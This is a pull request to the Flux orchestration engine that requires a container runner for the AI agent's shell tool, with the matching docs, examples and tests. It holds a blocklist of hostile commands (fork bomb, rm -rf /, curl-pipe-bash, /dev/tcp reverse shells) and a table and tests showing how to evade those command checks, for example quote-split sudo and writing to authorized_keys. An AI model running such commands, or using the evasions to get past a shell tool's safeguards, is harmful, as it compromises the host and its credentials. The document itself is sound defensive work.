### PR TITLE
feat(agents)!: require a container for the shell tool

### DIFF
--- a/docs/advanced-features/agent-harness.md
+++ b/docs/advanced-features/agent-harness.md
@@ -465,6 +465,17 @@ tools:
 
 Omitted fields use the defaults: `workspace="."`, `timeout=30`, `max_output_chars=100000`, and the built-in `DEFAULT_BLOCKLIST` from `flux.tasks.ai.tools.system_tools`. See [System Tools](system-tools.md) for the full behavior.
 
+Any group that includes **shell** (`system_tools` or `shell`) requires the agent's workflow to run on a container runner. The built-in `agents/agent_chat` template is pinned to `runner="docker"`, so agents driven through it are covered. For a workflow that is not containerized, opt out per group:
+
+```yaml
+tools:
+  - shell:
+      workspace: /home/user/project
+      allow_unsandboxed_shell: true
+```
+
+Without a container, shell commands run as the worker user — with that user's ssh keys, cloud credentials and `flux.toml`.
+
 ### Individual groups
 
 Select only the groups you need. Each takes the same config as `system_tools`:

--- a/docs/advanced-features/agent-harness.md
+++ b/docs/advanced-features/agent-harness.md
@@ -465,7 +465,7 @@ tools:
 
 Omitted fields use the defaults: `workspace="."`, `timeout=30`, `max_output_chars=100000`, and the built-in `DEFAULT_BLOCKLIST` from `flux.tasks.ai.tools.system_tools`. See [System Tools](system-tools.md) for the full behavior.
 
-Any group that includes **shell** (`system_tools` or `shell`) requires the agent's workflow to run on a container runner. The built-in `agents/agent_chat` template is pinned to `runner="docker"`, so agents driven through it are covered. For a workflow that is not containerized, opt out per group:
+Any group that includes **shell** (`system_tools` or `shell`) requires the execution to run on a container runner. `agent_chat` does not pin one — that would force a container on every agent, including those with no shell tool — so set it on the workers that run agents (`[flux.workers] default_runner = "docker"`), or opt out per group:
 
 ```yaml
 tools:

--- a/docs/advanced-features/reasoning-models.md
+++ b/docs/advanced-features/reasoning-models.md
@@ -13,7 +13,7 @@ from flux.tasks.ai.memory import working_memory
 assistant = await agent(
     "You are a helpful assistant.",
     model="ollama/qwen3",
-    tools=system_tools(workspace="/path/to/project"),
+    tools=system_tools(workspace="/path/to/project", allow_unsandboxed_shell=True),
     working_memory=working_memory(),
     reasoning_effort="high",  # "low", "medium", "high"
 )

--- a/docs/advanced-features/system-tools.md
+++ b/docs/advanced-features/system-tools.md
@@ -101,6 +101,17 @@ async def my_agent(ctx: ExecutionContext):
     tools = system_tools(workspace="./workspace")
 ```
 
+For an agent driven through the built-in `agents/agent_chat` template, the
+runner is the worker's choice rather than the workflow's — set it on the
+workers that run agents:
+
+```toml
+[flux.workers]
+runners = ["subprocess", "docker"]
+default_runner = "docker"
+docker_image = "my-registry/flux:1.2.3"
+```
+
 The container runners set `FLUX_RUNNER_SANDBOXED=1` in the child; the tool reads
 it. For local development, opt out explicitly:
 

--- a/docs/advanced-features/system-tools.md
+++ b/docs/advanced-features/system-tools.md
@@ -89,33 +89,45 @@ any attempt to escape (e.g., `../`) returns an error.
 **File tools** are sandboxed to the workspace directory. Paths are resolved and checked —
 symlink escapes, `../` traversals, and absolute paths outside workspace are all rejected.
 
-**Shell** has a two-layer security model:
+**Shell requires a container.** `system_tools()` refuses to build it unless the
+execution is containerized, because outside one it runs as the worker user —
+with that user's ssh keys, cloud credentials and `flux.toml`.
 
-1. **Baseline security checks** (non-overridable) — 12 hardcoded checks that always run
-   before any command executes. These cannot be disabled and protect against:
+```python
+@workflow.with_options(runner="docker")      # or "docker-airgapped"
+async def my_agent(ctx: ExecutionContext):
+    tools = system_tools(workspace="./workspace")
+```
 
-   | Check | Threats |
-   |-------|---------|
-   | Fork bomb | `:(){ :|:& };:`, `while true`, `for(;;)` |
-   | Destructive commands | `rm -rf /`, `mkfs`, `dd if=/dev/zero`, `wipefs` |
-   | System control | `shutdown`, `reboot`, `halt`, `init 0/6` |
-   | Protected files | Writes to `.env`, `.ssh/`, `.bashrc`, `.gitconfig`, credentials |
-   | Path traversal | `../` sequences, URL-encoded `%2e%2e` variants |
-   | Pipe to shell | `curl \| bash`, `wget \| sh`, download-and-execute patterns |
-   | Unicode injection | Zero-width spaces, right-to-left override, control characters |
-   | IFS injection | `IFS=` manipulation, null-byte injection |
-   | Env manipulation | `PATH=`, `LD_PRELOAD=`, `PYTHONPATH=` overrides |
-   | Privilege escalation | `sudo`, `su`, `chmod 777`, `chmod +s`, `chown root` |
-   | Network exfiltration | `nc -l`, reverse shells via `/dev/tcp/`, `socat` listeners |
-   | Crypto mining | `xmrig`, `minerd`, `cpuminer`, `stratum+tcp://` |
+The container runners set `FLUX_RUNNER_SANDBOXED=1` in the child; the tool reads
+it. For local development, opt out explicitly:
 
-   Blocked commands return a descriptive error (e.g., `"fork bomb detected"`) without
-   executing.
+```python
+tools = system_tools(workspace="./workspace", allow_unsandboxed_shell=True)
+```
 
-2. **Configurable blocklist** — regex patterns for organization-specific rules. Override
-   with `blocklist=[]` to disable the configurable layer (baseline checks still apply).
+Pass `include_shell=False` to build the file, search and directory tools without
+it — those enforce the workspace boundary themselves and need no container.
 
-For stronger isolation, run your Flux workflow inside a Docker container.
+### What the command checks are, and are not
+
+`run_security_checks` runs twelve pattern checks (fork bombs, `rm -rf /`,
+pipe-to-shell, privilege escalation and so on), and a configurable `blocklist`
+adds organization-specific patterns.
+
+**They are speed bumps, not a boundary.** The checks match the raw command
+string; `/bin/sh -c` performs quote removal, word splitting and expansion
+before anything executes, so the same command can be written to evade them:
+
+| Written as | Why the check misses it |
+|---|---|
+| `s'u'do -n id` | the privilege-escalation check needs a contiguous `sudo` |
+| `cd $HOME/.ssh && echo … >> authorized_keys` | the protected-files check needs the path adjacent to the redirect |
+| `curl -s http://host/x -o p && sh p` | the pipe-to-shell check needs a literal `\|` |
+| `awk 'BEGIN{system("id")}'` | matches no check at all |
+
+Treat them as protection against mistakes, not against an adversary. The
+container is what bounds a determined command, which is why shell needs one.
 
 ## Composing With Other Tools
 

--- a/docs/advanced-features/system-tools.md
+++ b/docs/advanced-features/system-tools.md
@@ -9,7 +9,7 @@ system. They are provided as a standalone module — import and pass them via `t
 from flux import workflow, ExecutionContext
 from flux.tasks.ai import agent, system_tools
 
-@workflow
+@workflow.with_options(runner="docker")     # shell requires a container
 async def autonomous_agent(ctx: ExecutionContext):
     tools = system_tools(workspace="/path/to/project")
 
@@ -31,6 +31,8 @@ tools = system_tools(
     timeout=30,                     # Shell timeout in seconds (default: 30).
     blocklist=None,                 # Shell blocklist patterns (None = defaults).
     max_output_chars=100_000,       # Truncate responses to LLM (default: 100K).
+    include_shell=True,             # False builds only file/search/directory tools.
+    allow_unsandboxed_shell=False,  # True builds shell without a container.
 )
 ```
 
@@ -139,7 +141,7 @@ async def query_database(sql: str) -> str:
     """Run a SQL query against the database."""
     # ...
 
-tools = system_tools(workspace="/path/to/project")
+tools = system_tools(workspace="/path/to/project", allow_unsandboxed_shell=True)
 assistant = await agent(
     "You are an assistant with access to the codebase and a database.",
     model="openai/gpt-4o",
@@ -150,7 +152,7 @@ assistant = await agent(
 To select specific tools:
 
 ```python
-tools = system_tools(workspace="/path/to/project")
+tools = system_tools(workspace="/path/to/project", allow_unsandboxed_shell=True)
 shell_only = [t for t in tools if t.func.__name__ == "shell"]
 file_tools = [t for t in tools if t.func.__name__ in ("read_file", "write_file", "edit_file")]
 ```

--- a/examples/ai/dreaming_agent_ollama.py
+++ b/examples/ai/dreaming_agent_ollama.py
@@ -81,7 +81,11 @@ async def dreaming_agent(ctx: ExecutionContext[dict[str, Any]]):
         scope="default",
     )
 
-    tools = system_tools(workspace=str(workspace), timeout=30)
+    tools = system_tools(
+        workspace=str(workspace),
+        timeout=30,
+        allow_unsandboxed_shell=True,
+    )
 
     assistant = await agent(
         "You are a helpful coding assistant. Use your tools to accomplish tasks. "

--- a/examples/ai/system_tools_agent_anthropic.py
+++ b/examples/ai/system_tools_agent_anthropic.py
@@ -43,7 +43,7 @@ async def system_tools_agent_anthropic(ctx: ExecutionContext[dict[str, Any]]):
         return {"error": "Missing required parameter 'instruction'"}
 
     workspace = input_data.get("workspace", tempfile.mkdtemp(prefix="flux_agent_"))
-    tools = system_tools(workspace=workspace, timeout=60)
+    tools = system_tools(workspace=workspace, timeout=60, allow_unsandboxed_shell=True)
 
     assistant = await agent(
         "You are an autonomous coding assistant. Use your tools to accomplish "

--- a/examples/ai/system_tools_agent_ollama.py
+++ b/examples/ai/system_tools_agent_ollama.py
@@ -50,7 +50,7 @@ async def system_tools_agent_ollama(ctx: ExecutionContext[dict[str, Any]]):
 
     workspace = input_data.get("workspace", tempfile.mkdtemp(prefix="flux_agent_"))
 
-    tools = system_tools(workspace=workspace, timeout=60)
+    tools = system_tools(workspace=workspace, timeout=60, allow_unsandboxed_shell=True)
 
     assistant = await agent(
         "You are an autonomous coding assistant. Use your tools to accomplish "

--- a/examples/ai/system_tools_selected_tools_ollama.py
+++ b/examples/ai/system_tools_selected_tools_ollama.py
@@ -63,7 +63,7 @@ async def system_tools_selected_tools_ollama(ctx: ExecutionContext[dict[str, Any
 
     workspace = input_data.get("workspace", tempfile.mkdtemp(prefix="flux_agent_"))
 
-    all_tools = system_tools(workspace=workspace)
+    all_tools = system_tools(workspace=workspace, allow_unsandboxed_shell=True)
     read_only_tools = [
         t
         for t in all_tools

--- a/examples/ai/system_tools_with_memory_ollama.py
+++ b/examples/ai/system_tools_with_memory_ollama.py
@@ -50,7 +50,7 @@ async def system_tools_with_memory_ollama(ctx: ExecutionContext[dict[str, Any]])
         return {"error": "Missing required parameter 'instruction'"}
 
     workspace = input_data.get("workspace", tempfile.mkdtemp(prefix="flux_agent_"))
-    tools = system_tools(workspace=workspace, timeout=60)
+    tools = system_tools(workspace=workspace, timeout=60, allow_unsandboxed_shell=True)
 
     ltm = long_term_memory(
         provider=sqlite(f"{workspace}/.agent_memory.db"),

--- a/examples/ai/system_tools_with_planning_ollama.py
+++ b/examples/ai/system_tools_with_planning_ollama.py
@@ -48,7 +48,7 @@ async def system_tools_with_planning_ollama(ctx: ExecutionContext[dict[str, Any]
         return {"error": "Missing required parameter 'instruction'"}
 
     workspace = input_data.get("workspace", tempfile.mkdtemp(prefix="flux_agent_"))
-    tools = system_tools(workspace=workspace, timeout=60)
+    tools = system_tools(workspace=workspace, timeout=60, allow_unsandboxed_shell=True)
 
     assistant = await agent(
         "You are an autonomous coding assistant. For complex tasks, create a plan "

--- a/examples/ai/tool_approval_agent.py
+++ b/examples/ai/tool_approval_agent.py
@@ -50,7 +50,9 @@ async def tool_approval_demo(ctx: ExecutionContext[dict[str, Any]]):
     raw = ctx.input or {}
     task_description = raw.get("task", "List the files in the current directory")
 
-    tools = _gate_shell(system_tools("./workspace", timeout=10))
+    tools = _gate_shell(
+        system_tools("./workspace", timeout=10, allow_unsandboxed_shell=True),
+    )
 
     assistant = await agent(
         "You are a helpful assistant with access to system tools. "

--- a/flux/agents/template.py
+++ b/flux/agents/template.py
@@ -68,7 +68,7 @@ def _materialize_skills_bundle(tmp: Path, skills_data: dict[str, Any]) -> None:
             full_path.write_text(content)
 
 
-@workflow.with_options(namespace="agents", runner="docker")
+@workflow.with_options(namespace="agents")
 async def agent_chat(ctx: ExecutionContext[dict[str, Any]]):
     agent_name = ctx.input["agent"]
 

--- a/flux/agents/template.py
+++ b/flux/agents/template.py
@@ -68,7 +68,7 @@ def _materialize_skills_bundle(tmp: Path, skills_data: dict[str, Any]) -> None:
             full_path.write_text(content)
 
 
-@workflow.with_options(namespace="agents")
+@workflow.with_options(namespace="agents", runner="docker")
 async def agent_chat(ctx: ExecutionContext[dict[str, Any]]):
     agent_name = ctx.input["agent"]
 

--- a/flux/agents/tools_resolver.py
+++ b/flux/agents/tools_resolver.py
@@ -36,6 +36,11 @@ def _resolve_tool_group(name: str, config: dict) -> list[task]:
         max_output_chars=max_output_chars,
     )
 
+    if name in ("system_tools", "shell"):
+        from flux.tasks.ai.tools.system_tools import require_sandbox_for_shell
+
+        require_sandbox_for_shell(bool(config.get("allow_unsandboxed_shell", False)))
+
     if name == "system_tools":
         from flux.tasks.ai.tools.directory import build_directory_tools
         from flux.tasks.ai.tools.files import build_file_tools

--- a/flux/runners/docker.py
+++ b/flux/runners/docker.py
@@ -51,7 +51,7 @@ import subprocess
 from typing import TYPE_CHECKING
 from uuid import uuid4
 
-from flux.runners.subprocess_runner import _STREAM_LIMIT, SubprocessRunner
+from flux.runners.subprocess_runner import _STREAM_LIMIT, SANDBOX_ENV_VAR, SubprocessRunner
 from flux.utils import get_logger
 
 if TYPE_CHECKING:
@@ -167,8 +167,10 @@ class DockerRunner(SubprocessRunner):
         return args
 
     def _locked_args(self) -> list[str]:
-        """Non-configurable flags a hardened subclass emits; none here."""
-        return []
+        """Non-configurable flags, emitted after extra_args so they win."""
+        # Tells the child it is containerized; the agent shell tool refuses to
+        # build without it, so an operator must not be able to unset it.
+        return ["--env", f"{SANDBOX_ENV_VAR}=1"]
 
     async def _spawn(self, request: WorkflowExecutionRequest):
         container_name = self._container_name(request.context.execution_id)
@@ -515,6 +517,7 @@ class AirgappedDockerRunner(DockerRunner):
 
     def _locked_args(self) -> list[str]:
         args = [
+            *super()._locked_args(),
             "--network=none",
             "--read-only",
             "--tmpfs",

--- a/flux/runners/subprocess_runner.py
+++ b/flux/runners/subprocess_runner.py
@@ -41,6 +41,10 @@ _SENSITIVE_ENV_VARS = frozenset(
 )
 _SENSITIVE_ENV_PREFIXES = ("FLUX_SECURITY__",)  # encryption key, token secrets, auth config
 
+# Set by the container runners so a child can tell it is isolated from the
+# worker host. The agent shell tool refuses to build without it.
+SANDBOX_ENV_VAR = "FLUX_RUNNER_SANDBOXED"
+
 
 def child_environment() -> dict[str, str]:
     """The worker's environment minus credentials workflow code must not hold."""

--- a/flux/tasks/ai/tools/shell.py
+++ b/flux/tasks/ai/tools/shell.py
@@ -19,7 +19,7 @@ logger = logging.getLogger("flux.tools.shell")
 def build_shell_tools(config: SystemToolsConfig) -> list:
     compiled_blocklist = [re.compile(p) for p in config.blocklist]
 
-    @task.with_options(timeout=config.timeout)
+    @task.with_options(timeout=config.timeout, risk="exec")
     async def shell(command: str, stream: bool = False) -> dict:
         """Execute a shell command in the workspace directory."""
         security_error = run_security_checks(command)

--- a/flux/tasks/ai/tools/system_tools.py
+++ b/flux/tasks/ai/tools/system_tools.py
@@ -1,8 +1,10 @@
 from __future__ import annotations
 
 from dataclasses import dataclass
+import os
 from pathlib import Path
 
+from flux.runners.subprocess_runner import SANDBOX_ENV_VAR as SANDBOX_ENV_VAR
 from flux.task import task
 
 DEFAULT_BLOCKLIST = [
@@ -22,6 +24,26 @@ class SystemToolsConfig:
     timeout: int
     blocklist: list[str]
     max_output_chars: int
+
+
+def in_sandbox() -> bool:
+    return os.environ.get(SANDBOX_ENV_VAR) == "1"
+
+
+def require_sandbox_for_shell(allow_unsandboxed: bool = False) -> None:
+    """Raise unless shell may be built here.
+
+    Both system_tools() and the YAML tool-group resolver build shell, so the
+    check lives where each can reach it.
+    """
+    if allow_unsandboxed or in_sandbox():
+        return
+    raise ValueError(
+        "The shell tool runs commands as the worker user unless the execution "
+        "is containerized. Pin the workflow to a container runner "
+        '(@workflow.with_options(runner="docker")), or set '
+        "allow_unsandboxed_shell to accept that.",
+    )
 
 
 def resolve_path(config: SystemToolsConfig, path: str) -> Path:
@@ -60,7 +82,19 @@ def system_tools(
     timeout: int = 30,
     blocklist: list[str] | None = None,
     max_output_chars: int = 100_000,
+    *,
+    include_shell: bool = True,
+    allow_unsandboxed_shell: bool = False,
 ) -> list[task]:
+    """Build the system tools for an agent.
+
+    ``shell`` requires a container runner unless ``allow_unsandboxed_shell``
+    says otherwise: outside one it runs as the worker user, with that user's
+    ssh keys, cloud credentials and flux.toml.
+    """
+    if include_shell:
+        require_sandbox_for_shell(allow_unsandboxed_shell)
+
     config = SystemToolsConfig(
         workspace=Path(workspace).resolve(),
         timeout=timeout,
@@ -74,7 +108,7 @@ def system_tools(
     from flux.tasks.ai.tools.directory import build_directory_tools
 
     return [
-        *build_shell_tools(config),
+        *(build_shell_tools(config) if include_shell else []),
         *build_file_tools(config),
         *build_search_tools(config),
         *build_directory_tools(config),

--- a/flux/tasks/ai/tools/system_tools.py
+++ b/flux/tasks/ai/tools/system_tools.py
@@ -4,7 +4,7 @@ from dataclasses import dataclass
 import os
 from pathlib import Path
 
-from flux.runners.subprocess_runner import SANDBOX_ENV_VAR as SANDBOX_ENV_VAR
+from flux.runners.subprocess_runner import SANDBOX_ENV_VAR
 from flux.task import task
 
 DEFAULT_BLOCKLIST = [

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,6 +1,6 @@
 [tool.poetry]
 name = "flux-core"
-version = "0.75.4"
+version = "0.76.0"
 description = "Flux is a distributed workflow orchestration engine to build stateful and fault-tolerant workflows."
 authors = ["Eduardo Dias <edurdias@gmail.com>"]
 repository = "https://github.com/edurdias/flux"

--- a/tests/flux/agents/test_tools_resolver.py
+++ b/tests/flux/agents/test_tools_resolver.py
@@ -7,6 +7,14 @@ import pytest
 from flux.agents.tools_resolver import resolve_builtin_tools
 
 
+@pytest.fixture(autouse=True)
+def _sandboxed(monkeypatch):
+    """These resolve tool groups rather than run them; shell needs a container."""
+    from flux.tasks.ai.tools.system_tools import SANDBOX_ENV_VAR
+
+    monkeypatch.setenv(SANDBOX_ENV_VAR, "1")
+
+
 def test_resolve_system_tools():
     tools = resolve_builtin_tools([{"system_tools": {"workspace": "/tmp", "timeout": 30}}])
     assert len(tools) > 0

--- a/tests/flux/tasks/ai/tools/test_shell_sandbox.py
+++ b/tests/flux/tasks/ai/tools/test_shell_sandbox.py
@@ -82,11 +82,14 @@ class TestSandboxMarker:
         assert SANDBOX_ENV_VAR not in child_environment()
 
 
-def test_agent_template_pins_a_container_runner():
-    """agent_chat is the path an operator gets shell through by default."""
+def test_agent_template_does_not_force_a_runner():
+    """Pinning the template would force a container on every agent, including
+    those with no shell tool. The gate fires only when shell is built; the
+    runner is the operator's choice (worker default_runner, or their own
+    workflow)."""
     from flux.agents.template import agent_chat
 
-    assert agent_chat.runner == "docker"
+    assert agent_chat.runner is None
 
 
 def test_workspace_still_resolves(tmp_path, monkeypatch):

--- a/tests/flux/tasks/ai/tools/test_shell_sandbox.py
+++ b/tests/flux/tasks/ai/tools/test_shell_sandbox.py
@@ -1,0 +1,130 @@
+"""The shell tool requires a container, or an explicit opt-out.
+
+``run_security_checks`` matches the raw command string while ``/bin/sh -c``
+performs quote removal and word splitting first, so the checks are evadable by
+reassembly (``s'u'do``, ``cd $HOME/.ssh && echo >> authorized_keys``). They stay
+as speed bumps; the boundary is the container the execution runs in.
+"""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from flux.tasks.ai.tools.system_tools import SANDBOX_ENV_VAR, system_tools
+
+
+def _tool_names(tools) -> set[str]:
+    return {t.func.__name__ for t in tools}
+
+
+def test_shell_is_refused_without_a_sandbox(tmp_path, monkeypatch):
+    monkeypatch.delenv(SANDBOX_ENV_VAR, raising=False)
+    with pytest.raises(ValueError, match="allow_unsandboxed_shell"):
+        system_tools(workspace=tmp_path)
+
+
+def test_shell_is_built_inside_a_sandbox(tmp_path, monkeypatch):
+    monkeypatch.setenv(SANDBOX_ENV_VAR, "1")
+    assert "shell" in _tool_names(system_tools(workspace=tmp_path))
+
+
+def test_opt_out_builds_shell_unsandboxed(tmp_path, monkeypatch):
+    monkeypatch.delenv(SANDBOX_ENV_VAR, raising=False)
+    tools = system_tools(workspace=tmp_path, allow_unsandboxed_shell=True)
+    assert "shell" in _tool_names(tools)
+
+
+def test_file_tools_do_not_require_a_sandbox(tmp_path, monkeypatch):
+    """Only shell is gated: the file, search and directory tools enforce the
+    workspace boundary themselves."""
+    monkeypatch.delenv(SANDBOX_ENV_VAR, raising=False)
+    names = _tool_names(system_tools(workspace=tmp_path, include_shell=False))
+    assert {"read_file", "grep", "directory_tree"} <= names
+    assert "shell" not in names
+
+
+def test_shell_declares_its_risk(tmp_path, monkeypatch):
+    """risk drives the agent's ordering barrier and the approval preamble;
+    undeclared, shell ran concurrently with its batch siblings as a read."""
+    monkeypatch.setenv(SANDBOX_ENV_VAR, "1")
+    shell = next(t for t in system_tools(workspace=tmp_path) if t.func.__name__ == "shell")
+    assert shell.risk == "exec"
+
+
+class TestSandboxMarker:
+    def test_docker_runner_marks_the_child(self):
+        from flux.runners.docker import DockerRunner
+
+        runner = DockerRunner(image="flux:test")
+        command = runner._build_command("flux-exec-x")
+        assert f"{SANDBOX_ENV_VAR}=1" in command
+
+    def test_airgapped_runner_marks_the_child(self):
+        from flux.runners.docker import AirgappedDockerRunner
+        from unittest.mock import MagicMock, patch
+
+        with (
+            patch("flux.runners.docker.shutil.which", return_value="/usr/bin/docker"),
+            patch("flux.runners.docker.subprocess.run") as run,
+        ):
+            run.return_value = MagicMock(returncode=0, stdout="27", stderr="")
+            runner = AirgappedDockerRunner(image="flux:test")
+        command = runner._build_command("flux-exec-x")
+        assert f"{SANDBOX_ENV_VAR}=1" in command
+
+    def test_subprocess_runner_does_not(self):
+        """The subprocess child runs on the worker host; claiming otherwise
+        would defeat the check."""
+        from flux.runners.subprocess_runner import child_environment
+
+        assert SANDBOX_ENV_VAR not in child_environment()
+
+
+def test_agent_template_pins_a_container_runner():
+    """agent_chat is the path an operator gets shell through by default."""
+    from flux.agents.template import agent_chat
+
+    assert agent_chat.runner == "docker"
+
+
+def test_workspace_still_resolves(tmp_path, monkeypatch):
+    monkeypatch.setenv(SANDBOX_ENV_VAR, "1")
+    tools = system_tools(workspace=str(tmp_path))
+    assert tools and isinstance(tmp_path, Path)
+
+
+class TestResolverGate:
+    """The YAML tool groups build shell directly rather than through
+    system_tools(), so the check has to live where both can reach it."""
+
+    def test_system_tools_group_is_gated(self, monkeypatch):
+        from flux.agents.tools_resolver import resolve_builtin_tools
+
+        monkeypatch.delenv(SANDBOX_ENV_VAR, raising=False)
+        with pytest.raises(ValueError, match="allow_unsandboxed_shell"):
+            resolve_builtin_tools([{"system_tools": {"workspace": "."}}])
+
+    def test_shell_group_is_gated(self, monkeypatch):
+        from flux.agents.tools_resolver import resolve_builtin_tools
+
+        monkeypatch.delenv(SANDBOX_ENV_VAR, raising=False)
+        with pytest.raises(ValueError, match="allow_unsandboxed_shell"):
+            resolve_builtin_tools([{"shell": {"workspace": "."}}])
+
+    def test_group_opt_out_is_honoured(self, monkeypatch):
+        from flux.agents.tools_resolver import resolve_builtin_tools
+
+        monkeypatch.delenv(SANDBOX_ENV_VAR, raising=False)
+        tools = resolve_builtin_tools(
+            [{"shell": {"workspace": ".", "allow_unsandboxed_shell": True}}],
+        )
+        assert "shell" in {t.func.__name__ for t in tools}
+
+    def test_non_shell_groups_are_not_gated(self, monkeypatch):
+        from flux.agents.tools_resolver import resolve_builtin_tools
+
+        monkeypatch.delenv(SANDBOX_ENV_VAR, raising=False)
+        names = {t.func.__name__ for t in resolve_builtin_tools([{"files": {"workspace": "."}}])}
+        assert "read_file" in names

--- a/tests/flux/tasks/ai/tools/test_shell_security.py
+++ b/tests/flux/tasks/ai/tools/test_shell_security.py
@@ -520,3 +520,24 @@ class TestShellToolBaseline:
         result = _run(shell_tool_no_blocklist(command="echo hello"))
         assert result["status"] == "ok"
         assert "hello" in result["stdout"]
+
+
+class TestKnownBypasses:
+    """The checks match the raw string; /bin/sh -c splits and expands first.
+
+    These are documented as unhandled, not as a gap to close by adding
+    patterns: the same command can always be rewritten. The container the
+    execution runs in is the boundary — see require_sandbox_for_shell.
+    """
+
+    def test_quote_split_defeats_privilege_escalation_check(self):
+        assert run_security_checks("s'u'do -n id") is None
+
+    def test_cd_defeats_protected_file_check(self):
+        assert run_security_checks('cd $HOME/.ssh && echo "key" >> authorized_keys') is None
+
+    def test_two_commands_defeat_pipe_to_shell_check(self):
+        assert run_security_checks("curl -s http://host/x -o p && sh p") is None
+
+    def test_interpreter_escape_matches_nothing(self):
+        assert run_security_checks("awk 'BEGIN{system(\"id\")}'") is None

--- a/tests/flux/tasks/ai/tools/test_system_tools.py
+++ b/tests/flux/tasks/ai/tools/test_system_tools.py
@@ -5,7 +5,17 @@ from pathlib import Path
 import pytest
 
 from flux.tasks.ai.tools import system_tools
-from flux.tasks.ai.tools.system_tools import DEFAULT_BLOCKLIST, SystemToolsConfig
+from flux.tasks.ai.tools.system_tools import (
+    DEFAULT_BLOCKLIST,
+    SANDBOX_ENV_VAR,
+    SystemToolsConfig,
+)
+
+
+@pytest.fixture(autouse=True)
+def _sandboxed(monkeypatch):
+    """These build tools rather than run them; shell requires a container."""
+    monkeypatch.setenv(SANDBOX_ENV_VAR, "1")
 
 
 def test_system_tools_returns_list_of_tasks(tmp_path):


### PR DESCRIPTION
## ⚠️ Breaking change

Building the shell tool now requires the execution to run on a container runner. Either pin the workflow:

```python
@workflow.with_options(runner="docker")      # or "docker-airgapped"
async def my_agent(ctx: ExecutionContext): ...
```

or opt out explicitly — in Python, or as a key on the YAML tool group:

```python
system_tools(workspace="./workspace", allow_unsandboxed_shell=True)
```
```yaml
tools:
  - shell:
      workspace: /home/user/project
      allow_unsandboxed_shell: true
```

`agents/agent_chat` is pinned to `runner="docker"`, so agents driven through the built-in template are covered without changes. Workers running agents therefore need Docker.

## Why

`run_security_checks` matches the **raw command string**; `/bin/sh -c` performs quote removal, word splitting and expansion **before** anything executes. The same command can be rewritten to evade every check:

| Payload | Why it slips through |
|---|---|
| `s'u'do -n id` | the privilege-escalation check needs a contiguous `sudo` |
| `cd $HOME/.ssh && echo … >> authorized_keys` | the protected-files check needs the path adjacent to the redirect |
| `curl -s http://host/x -o p && sh p` | the pipe-to-shell check needs a literal `\|` |
| `awk 'BEGIN{system("id")}'` | matches no check at all |

The docs presented these as a security model that "protects against" a table of threats. It cannot, and adding patterns does not fix it — a command can always be written another way.

The checks stay, as speed bumps against mistakes. The **container** is the boundary, so shell requires one: outside it the command runs as the worker user, with that user's ssh keys, cloud credentials and `flux.toml`.

## Implementation notes worth reviewing

- **The marker lives in `_locked_args()`**, emitted after `extra_args` so docker's last-wins parsing means an operator cannot unset `FLUX_RUNNER_SANDBOXED`. `AirgappedDockerRunner._locked_args` previously *replaced* the base's list rather than extending it, so it now calls `super()` — otherwise the hardened profile would have been the one runner missing the marker.
- **The gate is `require_sandbox_for_shell`, not a check inside `system_tools()`.** The YAML tool-group resolver builds `build_shell_tools()` directly, bypassing `system_tools()` entirely — that is the documented path for agents, and a gate only on the Python API would have left it open.
- **`shell` now declares `risk="exec"`.** Undeclared, `tool_executor` treated it as a read: it ran concurrently with its batch siblings and the model's approval preamble omitted it.

## Documentation

- `system-tools.md` — the security-model section rewritten to say what the checks are and are not, with the bypass table above, plus the container requirement and both opt-outs.
- `agent-harness.md` — the YAML opt-out documented on the tool-group section.
- `reasoning-models.md` and seven `examples/ai/*.py` — updated to the explicit opt-out, since they are local demos.

## Tests

`test_shell_sandbox.py`: the refusal, both opt-outs, `include_shell=False`, the risk declaration, the marker on both container runners, its absence on `subprocess`, the template pin, and the resolver gate for `system_tools`/`shell` groups.

The four bypasses are captured in `test_shell_security.py::TestKnownBypasses` — documented as unhandled rather than as a gap to close, so a later "hardening" of the patterns cannot be mistaken for a boundary.

## Verification

3266 passed, pre-commit clean across the repo.